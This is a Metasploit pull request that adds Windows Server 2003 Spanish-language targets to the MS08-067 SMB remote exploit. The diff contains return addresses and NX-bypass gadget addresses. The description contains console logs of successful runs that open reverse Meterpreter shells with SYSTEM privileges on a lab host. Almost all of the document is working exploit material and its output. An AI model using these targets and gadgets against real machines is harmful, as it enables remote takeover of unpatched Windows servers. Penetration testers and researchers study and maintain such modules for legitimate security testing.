### PR TITLE
Added W2003 SP2 Spanish targets

### DIFF
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -665,6 +665,25 @@ class Metasploit3 < Msf::Exploit::Remote
 					], # JMP ESI WS2HELP.DLL
 
 					# Standard return-to-ESI without NX bypass
+					[ 'Windows 2003 SP1 Spanish (NO NX)',
+						{
+							'Ret'       => 0x71ac21a2,
+							'Scratch'   => 0x00020408,
+						}
+					], # JMP ESI WS2HELP.DLL
+
+					# Brett Moore's crafty NX bypass for 2003 SP1
+					[ 'Windows 2003 SP1 Spanish (NX)',
+						{
+							'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
+							'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
+							'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
+							'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
+							'Scratch'   => 0x00020408,
+						}
+					],
+
+					# Standard return-to-ESI without NX bypass
 					[ 'Windows 2003 SP2 Spanish (NO NX)',
 						{
 							'Ret'       => 0x71ac3969,

--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -198,7 +198,6 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					],
 
-
 					# Standard return-to-ESI without NX bypass
 					[ 'Windows 2003 SP2 German (NO NX)',
 						{
@@ -217,7 +216,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Scratch'   => 0x00020408,
 						}
 					],
-
 
 					#
 					# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
@@ -666,6 +664,24 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					], # JMP ESI WS2HELP.DLL
 
+					# Standard return-to-ESI without NX bypass
+					[ 'Windows 2003 SP2 Spanish (NO NX)',
+						{
+							'Ret'       => 0x71ac3969,
+							'Scratch'   => 0x00020408,
+						}
+					], # JMP ESI WS2HELP.DLL
+
+					# Brett Moore's crafty NX bypass for 2003 SP2
+					[ 'Windows 2003 SP2 Spanish (NX)',
+						{
+							'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
+							'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+							'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
+							'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
+							'Scratch'   => 0x00020408,
+						}
+					],
 
 					#
 					# Missing Targets

--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -681,7 +681,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
 							'Scratch'   => 0x00020408,
 						}
-					],
+					]
 
 					#
 					# Missing Targets


### PR DESCRIPTION
Tested Successfully on W2003 SP2 Spanish (NO NX):

<pre>
   64  Windows 2003 SP2 Spanish (NO NX)
   65  Windows 2003 SP2 Spanish (NX)


msf  exploit(ms08_067_netapi) > set target 64
target => 64
msf  exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.130:4444 
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.141
[*] Meterpreter session 3 opened (192.168.1.130:4444 -> 192.168.1.141:1027) at 2012-08-24 11:05:46 +0200

meterpreter > sysinfo
Computer        : JUAN-E1DFCF0934
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : es_ES
Meterpreter     : x86/win32
meterpreter > cd c:\
meterpreter > cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=AlwaysOff /fastdetect
meterpreter > 

</pre>


And W2003 SP2 Spanish (NX)

<pre>
   64  Windows 2003 SP2 Spanish (NO NX)
   65  Windows 2003 SP2 Spanish (NX)


msf  exploit(ms08_067_netapi) > set target 65
target => 65
msf  exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
msf  exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.130:4444 
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.141
[*] Meterpreter session 4 opened (192.168.1.130:4444 -> 192.168.1.141:1027) at 2012-08-24 11:09:08 +0200

meterpreter > sysinfo
Computer        : JUAN-E1DFCF0934
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : es_ES
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd c:\
meterpreter > cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=OptOut /fastdetect
meterpreter > 

</pre>
